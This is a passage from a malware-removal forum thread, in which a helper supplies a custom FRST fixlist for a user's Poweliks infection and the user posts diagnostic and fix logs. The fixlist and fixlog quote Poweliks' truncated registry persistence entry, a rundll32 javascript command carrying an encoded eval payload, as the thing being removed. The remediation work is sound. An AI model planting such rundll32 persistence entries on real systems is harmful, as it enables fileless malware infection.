Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:01 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/16/2014 04:59:08 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 10.0.9200.16798 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: e44
 
Start Time: 01cfe93d74fbb02f
 
Termination Time: 34
 
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
 
Report Id: 3ec2f959-5577-11e4-8740-fc4dd4391d8c
 
Error: (10/16/2014 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 10.0.9200.16798 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 35fc
 
Start Time: 01cfe96226cb355b
 
Termination Time: 13
 
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Report Id:
 
 
System errors:
=============
Error: (10/17/2014 08:28:59 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/16/2014 05:03:09 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}
 
Error: (10/16/2014 09:17:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/16/2014 08:28:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/16/2014 07:18:50 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/16/2014 07:12:23 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/15/2014 05:55:12 PM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
 
Error: (10/15/2014 11:21:00 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/15/2014 10:38:59 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/15/2014 10:26:15 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
 
Microsoft Office Sessions:
=========================
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:01 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_8444db7d32915e4c\MFC80U.DLL
 
Error: (10/16/2014 04:59:08 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe10.0.9200.16798e4401cfe93d74fbb02f34C:\Program Files\Internet Explorer\iexplore.exe3ec2f959-5577-11e4-8740-fc4dd4391d8c
 
Error: (10/16/2014 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE10.0.9200.1679835fc01cfe96226cb355b13C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-10-01 14:09:17.272
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2014-10-01 14:09:17.210
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 71%
Total physical RAM: 7987.82 MB
Available physical RAM: 2284.91 MB
Total Pagefile: 15973.84 MB
Available Pagefile: 8428.31 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB
 
==================== Drives ================================
 
Drive c: (Local Disk) (Fixed) (Total:931.51 GB) (Free:861.56 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive g: (Storage) (Network) (Total:499 GB) (Free:77 GB) NTFS
Drive h: (Application) (Network) (Total:500 GB) (Free:226.9 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: DBD7E889)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#11 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 18 October 2014 - 02:35 PM

Hi Calimus-

 

Please copy and paste the contents of the code box below into a notepad file and save it as Fixlist.txt  to the location where your FRST.exe file is located.  I noticed FRST running from a location other than your desktop "C:\TEMP\Combofix files".  NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.

                                                                                      
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 ==================================================================================================================

IN YOUR NEXT REPLY I NEED:
 
1.)  Your FRST Fixlist log

 

Thanks :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#12 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 20 October 2014 - 05:57 AM

ok, ran the fix and here is the fix log.

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 20-10-2014
Ran by wsnyder1 at 2014-10-20 06:56:30 Run:1
Running from C:\TEMP\Combofix files
Loaded Profile: wsnyder1 (Available profiles: rpass & Altiris & altirisdeploy & cyoakum1 & ktassone & wsnyder1 & bashburn & netadmin)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
*****************
 
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\{3DDBF410-6D95-4233-A758-50EA5258FC89} => Moved successfully.
C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job => Moved successfully.
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 => Moved successfully.
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 => Moved successfully.
 
==== End of Fixlog ====


#13 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 20 October 2014 - 12:22 PM

So, since applying the fix and rebooting, nothing has changed for the better.  Maleware bytes still is giving warnings about the same sites and now the OS License has reset and is asking for it to be reapplied.



#14 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 21 October 2014 - 07:02 AM

Hello Calimus-

 

We are making progress but we still have some work to do.   :)

 

Download RogueKiller from one of the following links and save it to your desktop:

§  Link 1

§  Link 2

o   Close all programs and disconnect any USB or external drives before running the tool.

o   Double-click RogueKiller.exe to run the tool (Vista or 7 users: Right-click and select Run As Administrator).

o   Once the Prescan has finished, click Scan.

o   Once the Status box shows "Scan Finished", click the "Report" button to show the log, and then close the program<--Don't fix anything!

o   Copy and paste the report that opens into your next reply.

§  The log can also be found in the following location: C:\ProgramData\RogueKiller\Logs\RKreport_SCN_mmddyyyy_hhmmss.log

§  >>For XP users, you must first show hidden files/folders, then the log location is here: C:\Documents and Settings\All Users\Application data\RogueKiller\Logs\RKreport_SCN_mmddyyyy_hhmmss.log

 

 ------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.)    Your Rogue Killer log

 

Thanks   :) 

 

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


#15 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 24 October 2014 - 07:26 AM

Hello Calimus-
 
As stated in my welcome post
 

If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.

 
It has been 3 days since my last post.  Do you still need help?  If so please follow the instructions in my previous post and copy and paste the log.
 
Thanks  :)


avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users